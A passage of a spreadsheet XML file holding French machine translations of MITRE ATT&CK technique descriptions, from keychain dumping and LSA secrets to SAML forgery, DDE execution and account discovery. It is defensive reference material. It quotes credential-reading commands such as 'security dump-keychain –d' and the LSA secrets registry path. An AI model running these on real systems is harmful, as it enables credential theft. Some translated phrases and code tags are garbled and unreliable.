Les trousseaux peuvent être affichés et modifiés via l’application Trousseau d’accès ou à l’aide de l’utilitaire &lt;code&gt;de sécurité de&lt;/code&gt; ligne de commande. Les fichiers du trousseau se trouvent dans &lt;code&gt;~/Library/Keychains/&lt;/code&gt;, &lt;code&gt;/Library/Keychains/&lt;/code&gt; et &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation : Keychain Services Apple)(Citation : Passware de déchiffrement du trousseau)(Citation : Porte-clés OSX Schaumann)
Les adversaires peuvent collecter les informations d’identification de l’utilisateur à partir du stockage/de la mémoire du trousseau. Par exemple, la commande &lt;code&gt;security dump-keychain –d&lt;/code&gt; sauvegardera toutes les informations d’identification du trousseau de connexion à partir de &lt;code&gt;~/Library/Keychains/login.keychain-db&lt;/code&gt;. Les adversaires peuvent également lire directement les informations d’identification du trousseau de connexion à partir du fichier &lt;code&gt;~/Library/Keychains/login.keychain&lt;/code&gt;. Les deux méthodes nécessitent un mot de passe, où le mot de passe par défaut pour le trousseau de connexion est le mot de passe de l’utilisateur actuel pour se connecter à l’hôte macOS. (citation : externe à DA, à la manière d’OS X)(Citation : Décryptage du porte-clés Empire)
https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer les paramètres système pour exécuter automatiquement un programme lors du démarrage ou de la connexion du système afin de maintenir la persistance ou d’obtenir des privilèges de niveau supérieur sur les systèmes compromis. Les systèmes d’exploitation peuvent avoir des mécanismes pour exécuter automatiquement un programme lors du démarrage du système ou de la connexion au compte. (Citation : Clé d’exécution Microsoft)(Citation : Packages d’authentification MSDN)(Citation : Microsoft TimeProvider)(Citation : Cylance Reg Persistence septembre 2013)(Citation : Programmation du noyau Linux) Ces mécanismes peuvent inclure l’exécution automatique de programmes placés dans des répertoires spécialement désignés ou référencés par des référentiels qui stockent des informations de configuration, tels que le registre Windows. Un adversaire peut atteindre le même objectif en modifiant ou en étendant des fonctionnalités du noyau.
Étant donné que certains programmes de démarrage automatique de démarrage ou d’ouverture de session s’exécutent avec des privilèges plus élevés, un adversaire peut les exploiter pour élever les privilèges.
https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>Les adversaires disposant d’un accès SYSTEM à un hôte peuvent tenter d’accéder aux secrets LSA (Local Security Authority), qui peuvent contenir divers éléments d’identification différents, tels que des informations d’identification pour les comptes de service. (Citation : Passcape LSA Secrets)(citation : Modèle de niveau administrateur Microsoft AD)(Citation : Références Windows Tilbury) Les secrets LSA sont stockés dans le registre à l’emplacement &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. Les secrets LSA peuvent également être vidés de la mémoire. (Citation : ired Dumping LSA Secrets)
[Rég.](https://attack.mitre.org/software/S0075) peut être utilisé pour extraire du registre. [Mimikatz](https://attack.mitre.org/software/S0002) peut être utilisé pour extraire des secrets de la mémoire. (Citation : ired Dumping LSA Secrets)
https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre la capacité de chiffrement d’un périphérique réseau afin de contourner le chiffrement qui protégerait autrement les communications de données. (Citation : Cisco Synful Knock Evolution)
Le chiffrement peut être utilisé pour protéger le trafic réseau transmis afin de préserver sa confidentialité (protection contre la divulgation non autorisée) et son intégrité (protection contre les modifications non autorisées). Les chiffrements de chiffrement sont utilisés pour convertir un message en texte brut en texte chiffré et peuvent nécessiter beaucoup de calcul pour être déchiffrés sans la clé de déchiffrement associée. En règle générale, les clés plus longues augmentent le coût de la cryptanalyse, ou du déchiffrement sans la clé.
Les adversaires peuvent compromettre et manipuler les appareils qui effectuent le chiffrement du trafic réseau. Par exemple, par le biais de comportements tels que [Modifier l’image système](https://attack.mitre.org/techniques/T1601), [Réduire l’espace clé](https://attack.mitre.org/techniques/T1600/001) et [Désactiver le matériel cryptographique](https://attack.mitre.org/techniques/T1600/002), un adversaire peut affecter négativement et/ou éliminer la capacité d’un appareil à chiffrer en toute sécurité le trafic réseau. Cela présente un risque accru de divulgation non autorisée et peut faciliter la manipulation des données, l’accès aux identifiants ou les efforts de collecte. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>Un adversaire peut falsifier des jetons SAML avec toutes les autorisations, revendications et durées de vie s’il possède un certificat de signature de jeton SAML valide. (Citation : Étapes de Microsoft SolarWinds) La durée de vie par défaut d’un jeton SAML est d’une heure, mais la période de validité peut être spécifiée dans la valeur &lt;code&gt;NotOnOrAfter&lt;/code&gt; de l’élément &lt;code&gt;conditions ...&lt;/code&gt; d’un jeton. Cette valeur peut être modifiée à l’aide de &lt;code&gt;AccessTokenLifetime&lt;/code&gt; dans une &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;. (Citation : Durée de vie des jetons SAML Microsoft) Les jetons SAML falsifiés permettent aux adversaires de s’authentifier sur les services qui utilisent SAML 2.0 comme mécanisme d’authentification unique (SSO). (Citation : Cyberark Golden SAML)
Un adversaire peut utiliser des [clés privées](https://attack.mitre.org/techniques/T1552/004) pour compromettre le certificat de signature de jeton d’une organisation afin de créer des jetons SAML falsifiés. Si l’adversaire dispose des autorisations suffisantes pour établir une nouvelle approbation de fédération avec son propre serveur AD FS (Active Directory Federation Services), il peut générer son propre certificat de signature de jeton approuvé. (Citation : Guide client de Microsoft SolarWinds) Cela diffère de [Voler le jeton d’accès à l’application](https://attack.mitre.org/techniques/T1528) et d’autres comportements similaires en ce sens que les jetons sont nouveaux et falsifiés par l’adversaire, plutôt que volés ou interceptés auprès d’utilisateurs légitimes.
Un adversaire peut obtenir des privilèges d’ID Entra administratif si un jeton SAML falsifié qui prétend représenter un compte hautement privilégié est falsifié. Cela peut conduire à [Utiliser un autre matériel d’authentification](https://attack.mitre.org/techniques/T1550), qui peut contourner les mécanismes de protection multifactoriels et autres mécanismes de protection contre l’authentification. (Citation : Guide client de Microsoft SolarWinds)
https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent faire passer des charges utiles malveillantes pour des fichiers légitimes en modifiant la mise en forme de la charge utile, y compris la signature, l’extension et le contenu du fichier. Différents types de fichiers ont un format standard typique, y compris la façon dont ils sont encodés et organisés. Par exemple, la signature d’un fichier (également appelée en-tête ou octets magiques) est le premier octet d’un fichier et est souvent utilisée pour identifier le type de fichier. Par exemple, l’en-tête d’un fichier JPEG est &lt;code&gt; 0xFF 0xD8&lt;/code&gt; et l’extension de fichier est '. JPE', '. JPEG » ou « .JPG ». 
Les adversaires peuvent modifier le code hexadécimal de l’en-tête et/ou l’extension de fichier d’une charge utile malveillante afin de contourner les vérifications de validation de fichier et/ou le nettoyage des entrées. Ce comportement est couramment utilisé lorsque des fichiers de charge utile sont transférés (par exemple, [Transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105)) et stockés (par exemple, [Charger un logiciel malveillant](https://attack.mitre.org/techniques/T1608/001)) afin que les adversaires puissent déplacer leurs programmes malveillants sans déclencher de détections. 
Les types et extensions de fichiers non exécutables courants, tels que les fichiers texte (.txt  et les fichiers image (.jpg .gif, etc.) peuvent généralement être traités comme inoffensifs.  Sur cette base, les adversaires peuvent utiliser une extension de fichier pour dissimuler des logiciels malveillants, par exemple en nommant un code de porte dérobée PHP avec un nom de fichier de &lt;code&gt;test.gif&lt;/code&gt;. Un utilisateur peut ne pas savoir qu’un fichier est malveillant en raison de son apparence bénigne et de son extension.
Les fichiers polygots, c’est-à-dire des fichiers qui ont plusieurs types de fichiers différents et qui fonctionnent différemment en fonction de l’application qui les exécutera, peuvent également être utilisés pour dissimuler des logiciels malveillants et des capacités malveillantes. (Référence : polygot_icedID)
https://attack.mitre.org/techniques/T1036/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent arrêter ou désactiver des services sur un système pour rendre ces services indisponibles pour les utilisateurs légitimes. L’arrêt de services ou de processus critiques peut inhiber ou arrêter la réponse à un incident ou contribuer aux objectifs globaux de l’adversaire de causer des dommages à l’environnement. (Citation : Talos Olympic Destroyer 2018)(Citation : Novetta Blockbuster) 
Les adversaires peuvent y parvenir en désactivant des services individuels de grande importance pour une organisation, tels que &lt;code&gt;MSExchangeIS,&lt;/code&gt; ce qui rendra le contenu Exchange inaccessible. (Citation : Novetta Blockbuster) Dans certains cas, les adversaires peuvent arrêter ou désactiver plusieurs ou tous les services pour rendre les systèmes inutilisables. (Citation : Talos Olympic Destroyer 2018) Les services ou les processus peuvent ne pas permettre la modification de leurs magasins de données pendant leur exécution. Les adversaires peuvent arrêter des services ou des processus afin d’effectuer [Destruction de données](https://attack.mitre.org/techniques/T1485) ou [Données chiffrées pour impact](https://attack.mitre.org/techniques/T1486) sur les magasins de données de services tels qu’Exchange et SQL Server. (Citation : Analyse WannaCry de SecureWorks)
https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>Les adversaires peuvent développer des logiciels malveillants et des composants de logiciels malveillants qui peuvent être utilisés lors du ciblage. La création de logiciels malveillants peut inclure le développement de charges utiles, de droppers, d’outils de post-compromission, de portes dérobées (y compris des images de porte dérobée), de packers, de protocoles C2 et la création de supports amovibles infectés. Les adversaires peuvent développer des logiciels malveillants pour soutenir leurs opérations, créant ainsi un moyen de garder le contrôle des machines distantes, d’échapper aux défenses et d’exécuter des comportements post-compromission. (Référence : Mandiant APT1)(Référence : Kaspersky Sofacy)(Citation : ActiveMalwareEnergy)(Citation : FBI Flash FIN7 USB)
Comme pour les efforts de développement légitimes, différents ensembles de compétences peuvent être nécessaires pour développer des logiciels malveillants. Les compétences nécessaires peuvent être acquises à l’interne ou faire l’objet d’une sous-traitance. Le recours à un sous-traitant peut être considéré comme une extension des capacités de développement de logiciels malveillants de cet adversaire, à condition que l’adversaire joue un rôle dans l’élaboration des exigences et maintienne un certain degré d’exclusivité sur le logiciel malveillant.
Certains aspects du développement de logiciels malveillants, tels que le développement du protocole C2, peuvent nécessiter que les adversaires obtiennent une infrastructure supplémentaire. Par exemple, les logiciels malveillants développés qui communiqueront avec Twitter pour C2 peuvent nécessiter l’utilisation de [Services Web](https://attack.mitre.org/techniques/T1583/006). (Référence : FireEye APT29)
https://attack.mitre.org/techniques/T1587/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’énumérer les pilotes de périphériques locaux sur un hôte victime. Les informations sur les pilotes de périphériques peuvent mettre en évidence diverses informations qui façonnent les comportements ultérieurs, tels que la fonction/l’objectif de l’hôte, les outils de sécurité actuels (par exemple, [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) ou d’autres défenses (par exemple, [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), ainsi que les vulnérabilités potentiellement exploitables (par exemple, [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068)).
De nombreux utilitaires de système d’exploitation peuvent fournir des informations sur les pilotes de périphériques locaux, tels que driverquery.exe et la fonction API « EnumDeviceDrivers() » sous Windows. (Citation : Microsoft Driverquery)(Citation : Microsoft EnumDeviceDrivers) Des informations sur les pilotes de périphériques (ainsi que sur les services associés, c’est-à-dire [System Service Discovery](https://attack.mitre.org/techniques/T1007)) peuvent également être disponibles dans le registre. (Citation : Pilotes de registre Microsoft)
Sous Linux/macOS, les pilotes de périphériques (sous la forme de modules du noyau) peuvent être visibles dans '/dev' ou à l’aide d’utilitaires tels que 'lsmod' et 'modinfo'. (Citation : Programmation du noyau Linux)(Citation : lsmod man)(Citation : modinfo man)
https://attack.mitre.org/techniques/T1652</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes de domaine. Ces informations peuvent aider les adversaires à déterminer quels comptes de domaine existent pour faciliter les comportements de suivi, tels que le ciblage de comptes spécifiques possédant des privilèges particuliers.
Des commandes telles que &lt;code&gt;net user /domain&lt;/code&gt; et &lt;code&gt;net group /domain&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039), &lt;code&gt;dscacheutil -q group&lt;/code&gt; sur macOS et &lt;code&gt;ldapsearch&lt;/code&gt; sur Linux peuvent répertorier les utilisateurs et les groupes de domaine. [PowerShell](https://attack.mitre.org/techniques/T1059/001) les applets de commande, y compris &lt;code&gt;Get-ADUser&lt;/code&gt; et &lt;code&gt;Get-ADGroupMember&lt;/code&gt;, peuvent énumérer les membres de groupes Active Directory. (Citation : CrowdStrike StellarParticle, janvier 2022)
https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir la persistance en ajoutant une clé de registre à l’installation active de l’ordinateur local. L’installation active est un mécanisme Windows qui est utilisé pour exécuter des programmes lorsqu’un utilisateur se connecte. La valeur stockée dans la clé de registre sera exécutée une fois qu’un utilisateur s’est connecté à l’ordinateur. (Citation : Klein Active Setup 2010) Ces programmes seront exécutés dans le contexte de l’utilisateur et disposeront du niveau d’autorisations associé au compte.
Les adversaires peuvent abuser du programme d’installation active en créant une clé sous &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; et en définissant une valeur malveillante pour &lt;code&gt;StubPath&lt;/code&gt;. Cette valeur servira de programme qui sera exécuté lorsqu’un utilisateur se connectera à l’ordinateur. (Référence : Mandiant Glyer APT 2010)(Citation : Citizenlab Packrat 2015)(Citation : FireEye CFR Watering Hole 2012)(Citation : SECURELIST Bright Star 2015)(Citation : paloalto Tropic Trooper 2016)
Les adversaires peuvent abuser de ces composants pour exécuter des logiciels malveillants, tels que des outils d’accès à distance, afin de maintenir la persistance lors des redémarrages du système. Les adversaires peuvent également utiliser [Mascarade](https://attack.mitre.org/techniques/T1036) pour donner l’impression que les entrées du Registre sont associées à des programmes légitimes.
https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de cacher des artefacts associés à leurs comportements pour échapper à la détection. Les systèmes d’exploitation peuvent avoir des fonctionnalités permettant de masquer divers artefacts, tels que des fichiers système importants et l’exécution de tâches administratives, afin d’éviter de perturber l’environnement de travail des utilisateurs et d’empêcher les utilisateurs de modifier les fichiers ou les fonctionnalités du système. Les adversaires peuvent abuser de ces fonctionnalités pour masquer des artefacts tels que des fichiers, des répertoires, des comptes d’utilisateurs ou d’autres activités du système afin d’échapper à la détection. (Citation : Sofacy Komplex Trojan)(Citation : Cybereason OSX Pirrit)(Citation : MalwareBytes ADS juillet 2015)
Les adversaires peuvent également tenter de masquer des artefacts associés à un comportement malveillant en créant des régions informatiques isolées des instruments de sécurité courants, par exemple en utilisant la technologie de virtualisation. (Citation : Sophos Ragnar mai 2020)
https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser Windows Dynamic Data Exchange (DDE) pour exécuter des commandes arbitraires. DDE est un protocole client-serveur pour la communication inter-processus (IPC) unique et/ou continue entre les applications. Une fois qu’un lien est établi, les applications peuvent échanger de manière autonome des transactions composées de chaînes, de liens de données chaudes (notifications lorsqu’un élément de données change), de liens de données chaudes (duplications des modifications apportées à un élément de données) et de demandes d’exécution de commandes.
L’OLE (Object Linking and Embedding), ou la capacité de lier des données entre des documents, a été initialement mise en œuvre par DDE. Bien qu’il ait été remplacé par [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE peut être activé dans Windows 10 et la plupart de Microsoft Office 2016 via des clés de registre. (Citation : BleepingComputer DDE désactivé dans Word décembre 2017)(Citation : Microsoft ADV170021 décembre 2017)(Citation : Microsoft DDE Advisory Nov 2017)
Les documents Microsoft Office peuvent être empoisonnés à l’aide de commandes DDE, directement ou par le biais de fichiers intégrés, et utilisés pour fournir une exécution via des campagnes de [phishing](https://attack.mitre.org/techniques/T1566) ou du contenu Web hébergé, en évitant l’utilisation de macros Visual Basic pour Applications (VBA). (Citation : SensePost PS DDE mai 2016)(Citation : Bouilloire CSV DDE août 2014)(Citation : Enigma Reviving DDE janvier 2018)(Citation : SensePost MacroLess DDE octobre 2017) De même, les adversaires peuvent infecter des charges utiles pour exécuter des applications et/ou des commandes sur un appareil victime en intégrant des formules DDE dans un fichier CSV destiné à être ouvert via un tableur Windows. (Citation : Injection de CSV OWASP)(Citation : Injection de macro CSV Excel )
DDE pourrait également être exploité par un adversaire opérant sur une machine compromise qui n’a pas d’accès direct à un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059). L’exécution DDE peut être appelée à distance via [Remote Services](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM). (Référence : Fireeye Hunting COM juin 2019)
https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>Un adversaire peut s’appuyer sur l’ouverture d’un fichier malveillant par un utilisateur afin d’obtenir l’exécution. Les utilisateurs peuvent être soumis à l’ingénierie sociale pour les amener à ouvrir un fichier qui conduira à l’exécution de code. Cette action de l’utilisateur est généralement observée comme un comportement de suivi de [Pièce jointe de spearphishing](https://attack.mitre.org/techniques/T1566/001). Les adversaires peuvent utiliser plusieurs types de fichiers qui nécessitent l’exécution d’un utilisateur, notamment .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, etc. .reg.
Les adversaires peuvent utiliser diverses formes de [Mascarade](https://attack.mitre.org/techniques/T1036) et de [Fichiers ou informations obscurcis](https://attack.mitre.org/techniques/T1027) pour augmenter la probabilité qu’un utilisateur ouvre et exécute avec succès un fichier malveillant. Ces méthodes peuvent inclure l’utilisation d’une convention de nommage familière et/ou d’un mot de passe protégeant le fichier et la fourniture d’instructions à un utilisateur sur la façon de l’ouvrir. (Citation : Documents Word protégés par mot de passe) 
Bien que [Fichier malveillant](https://attack.mitre.org/techniques/T1204/002) se produise fréquemment peu de temps après l’accès initial, il peut se produire à d’autres phases d’une intrusion, par exemple lorsqu’un adversaire place un fichier dans un répertoire partagé ou sur le bureau d’un utilisateur en espérant qu’un utilisateur cliquera dessus. Cette activité peut également être observée peu de temps après [Spearphishing interne](https://attack.mitre.org/techniques/T1534).
https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le rythme des affaires de la victime qui peuvent être utilisées lors du ciblage. Les informations sur le rythme des activités d’une organisation peuvent inclure une variété de détails, y compris les heures d’ouverture et les jours de la semaine. Ces informations peuvent également révéler les heures et dates des achats et des expéditions des ressources matérielles et logicielles de la victime.
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Des informations sur le rythme des affaires peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite ThreatPost Broadvoice) La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Chaîne d’approvisionnement Compromis](https://attack.mitre.org/techniques/T1195) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199))
https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide des protocoles de couche applicative publish/subscribe (pub/sub) pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les protocoles tels que &lt;code&gt;MQTT,&lt;/code&gt; &lt;code&gt;XMPP,&lt;/code&gt; &lt;code&gt;AMQP&lt;/code&gt; et &lt;code&gt;STOMP&lt;/code&gt; utilisent une conception de publication/abonnement, la distribution des messages étant gérée par un courtier centralisé. (Citation : crabe gémissant sub/pub)(Citation : Mandiant APT1 Annexe) Les éditeurs classent leurs messages par thèmes, tandis que les abonnés reçoivent des messages en fonction des sujets auxquels ils sont abonnés. (Citation : crabe gémissant sub/pub) Un adversaire peut abuser des protocoles de publication/abonnement pour communiquer avec les systèmes sous son contrôle derrière un courtier de messages tout en imitant le trafic normal et attendu.
https://attack.mitre.org/techniques/T1071/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le matériel hôte de la victime qui peuvent être utilisées lors du ciblage. Les informations sur l’infrastructure matérielle peuvent inclure une variété de détails tels que les types et les versions sur des hôtes spécifiques, ainsi que la présence de composants supplémentaires qui pourraient indiquer des protections défensives supplémentaires (par exemple, lecteurs de cartes/biométriques, matériel de cryptage dédié, etc.).
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’actions de collecte directes via [Analyse active](https://attack.mitre.org/techniques/T1595) (par exemple : noms d’hôte, bannières de serveur, chaînes d’agent utilisateur) ou [Hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les adversaires peuvent également compromettre les sites et inclure du contenu malveillant conçu pour collecter des informations sur l’hôte auprès des visiteurs. (Citation : ATT ScanBox) Les informations sur l’infrastructure matérielle peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (par exemple, des offres d’emploi, des cartes de réseau, des rapports d’évaluation, des CV ou des factures d’achat). La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Rechercher des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), l’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Compromettre l’approvisionnement en matériel chaîne](https://attack.mitre.org/techniques/T1195/003) ou [Ajouts matériels](https://attack.mitre.org/techniques/T1200)).
https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent fournir des charges utiles à des systèmes distants en ajoutant du contenu à des emplacements de stockage partagés, tels que des lecteurs réseau ou des référentiels de code internes. Le contenu stocké sur des lecteurs réseau ou dans d’autres emplacements partagés peut être altéré par l’ajout de programmes malveillants, de scripts ou de code d’exploitation à des fichiers par ailleurs valides. Une fois qu’un utilisateur ouvre le contenu contaminé partagé, la partie malveillante peut être exécutée pour exécuter le code de l’adversaire sur un système distant. Les adversaires peuvent utiliser du contenu partagé contaminé pour se déplacer latéralement.
Un pivot de partage de répertoire est une variante de cette technique qui utilise plusieurs autres techniques pour propager des logiciels malveillants lorsque les utilisateurs accèdent à un répertoire réseau partagé. Il utilise [Modification de raccourci](https://attack.mitre.org/techniques/T1547/009) du répertoire . Les fichiers LNK qui utilisent [Masquerading](https://attack.mitre.org/techniques/T1036) pour ressembler aux vrais répertoires, qui sont cachés via [Fichiers et répertoires cachés](https://attack.mitre.org/techniques/T1564/001). Le malveillant . Les répertoires basés sur LNK ont une commande intégrée qui exécute le fichier malveillant caché dans le répertoire, puis ouvre le répertoire réel prévu afin que l’action attendue de l’utilisateur se produise toujours. Lorsqu’elle est utilisée avec des annuaires réseau fréquemment utilisés, cette technique peut entraîner des réinfections fréquentes et un accès étendu aux systèmes et potentiellement à de nouveaux comptes à privilèges plus élevés. (Citation : Retwin Directory Share Pivot)
Les adversaires peuvent également compromettre les répertoires de réseau partagés par le biais d’infections binaires en ajoutant ou en ajoutant son code au code binaire sain sur le répertoire de réseau partagé. Le logiciel malveillant peut modifier le point d’entrée d’origine (OEP) du binaire sain pour s’assurer qu’il est exécuté avant le code légitime. L’infection peut continuer à se propager via le fichier nouvellement infecté lorsqu’elle est exécutée par un système distant. Ces infections peuvent cibler à la fois des formats binaires et non binaires qui se terminent par des extensions incluant, mais sans s’y limiter, .EXE, .DLL, . SCR, .BAT et/ou .VBS.
https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>Les adversaires peuvent ajouter de nouvelles approbations de domaine, modifier les propriétés des approbations de domaine existantes ou modifier la configuration des relations d’approbation entre les domaines et les locataires pour contourner les défenses et/ou élever les privilèges. Les détails de confiance, tels que le fait que les identités des utilisateurs sont fédérées ou non, permettent aux propriétés d’authentification et d’autorisation de s’appliquer entre les domaines ou les locataires dans le but d’accéder aux ressources partagées. (Citation : Microsoft - Fédération Azure AD) Ces objets d’approbation peuvent inclure des comptes, des informations d’identification et d’autres éléments d’authentification appliqués à des serveurs, des jetons et des domaines.
La manipulation de ces approbations peut permettre à un adversaire d’augmenter ses privilèges et/ou d’échapper aux défenses en modifiant les paramètres pour ajouter des objets qu’il contrôle. Par exemple, dans les environnements Microsoft Active Directory (AD), cela peut être utilisé pour falsifier des [jetons SAML](https://attack.mitre.org/techniques/T1606/002) sans qu’il soit nécessaire de compromettre le certificat de signature pour falsifier de nouvelles informations d’identification. Au lieu de cela, un adversaire peut manipuler les approbations de domaine pour ajouter son propre certificat de signature. Un adversaire peut également convertir un domaine AD en domaine fédéré à l’aide des services de fédération Active Directory (AD FS), ce qui peut permettre des modifications malveillantes de l’approbation, telles que la modification des règles d’émission de revendications pour se connecter à n’importe quel ensemble valide d’informations d’identification en tant qu’utilisateur spécifié. (Citation : AADInternals zure AD Federated Domain) 
Un adversaire peut également ajouter un nouveau fournisseur d’identité fédérée à un locataire d’identité tel qu’Okta ou AWS IAM Identity Center, ce qui peut lui permettre de s’authentifier en tant qu’utilisateur du locataire. (Référence : Okta Cross-Tenant Impersonation 2023) Cela peut permettre à l’acteur malveillant d’obtenir un large accès à une variété de services basés sur le cloud qui exploitent le locataire d’identité. Par exemple, dans les environnements AWS, un adversaire qui crée un nouveau fournisseur d’identité pour une organisation AWS pourra fédérer tous les comptes membres de l’organisation AWS sans créer d’identités pour chacun des comptes membres. (Référence : AWS RE :Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un algorithme de chiffrement symétrique connu pour dissimuler le trafic de commande et de contrôle plutôt que de s’appuyer sur les protections inhérentes fournies par un protocole de communication. Les algorithmes de chiffrement symétrique utilisent la même clé pour le chiffrement en clair et le déchiffrement en texte chiffré. Les algorithmes de chiffrement symétrique courants incluent AES, DES, 3DES, Blowfish et RC4.
https://attack.mitre.org/techniques/T1573/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes système locaux. Ces informations peuvent aider les adversaires à déterminer quels comptes locaux existent sur un système pour faciliter le comportement de suivi.
Des commandes telles que &lt;code&gt;net user&lt;/code&gt; et &lt;code&gt;net localgroup&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039) et &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt; sous macOS et Linux peuvent répertorier les utilisateurs et les groupes locaux. (Référence : Mandiant APT1)(Citation : id man page)(Citation : page de manuel du groupe) Sous Linux, les utilisateurs locaux peuvent également être énumérés à l’aide du fichier &lt;code&gt;/etc/passwd&lt;/code&gt;. Sur macOS, la commande &lt;code&gt;dscl . list /Users&lt;/code&gt; peut être utilisée pour énumérer les comptes locaux.
https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les comptes de médias sociaux qui peuvent être utilisés lors du ciblage. Pour les opérations intégrant l’ingénierie sociale, l’utilisation d’un persona en ligne peut être importante. Plutôt que de créer et de cultiver des profils de médias sociaux (c’est-à-dire des comptes de médias sociaux](https://attack.mitre.org/techniques/T1585/001)), les adversaires peuvent compromettre les comptes de médias sociaux existants. L’utilisation d’un personnage existant peut engendrer un certain niveau de confiance chez une victime potentielle si elle a une relation ou une connaissance du personnage compromis. 
Il existe diverses méthodes pour compromettre les comptes de médias sociaux, telles que la collecte d’informations d’identification via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’informations d’identification sur des sites tiers ou par force brute d’informations d’identification (par exemple, la réutilisation de mots de passe à partir de vidages d’informations d’identification de violation). (Citation : AnonHBGary) Avant de compromettre les comptes de médias sociaux, les adversaires peuvent effectuer une reconnaissance pour éclairer les décisions sur les comptes à compromettre afin de poursuivre leurs opérations.
Les personas peuvent exister sur un seul site ou sur plusieurs sites (ex : Facebook, LinkedIn, Twitter, etc.). Les comptes de médias sociaux compromis peuvent nécessiter un développement supplémentaire, notamment le remplissage ou la modification des informations de profil, le développement des réseaux sociaux ou l’intégration de photos.
Les adversaires peuvent utiliser un profil de réseau social compromis pour créer de nouvelles connexions ou détourner des connexions existantes avec des cibles d’intérêt. Ces connexions peuvent être directes ou inclure d’essayer de se connecter par l’intermédiaire d’autres personnes. (Référence : NEWSCASTER2014)(Citation : BlackHatRobinSage) Les profils compromis peuvent être exploités au cours d’autres phases du cycle de vie de l’adversaire, par exemple lors de l’accès initial (ex : [Spearphishing via le Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du mode sans échec de Windows pour désactiver les défenses des terminaux. Le mode sans échec démarre le système d’exploitation Windows avec un ensemble limité de pilotes et de services. Les logiciels de sécurité tiers, tels que les outils de détection et de réponse aux points de terminaison (EDR), peuvent ne pas démarrer après le démarrage de Windows en mode sans échec. Il existe deux versions du mode sans échec : le mode sans échec et le mode sans échec avec mise en réseau. Il est possible de démarrer des services supplémentaires après un démarrage en mode sans échec. (Citation : Mode sans échec de Microsoft)(Citation : Sophos Snatch Ransomware 2019)
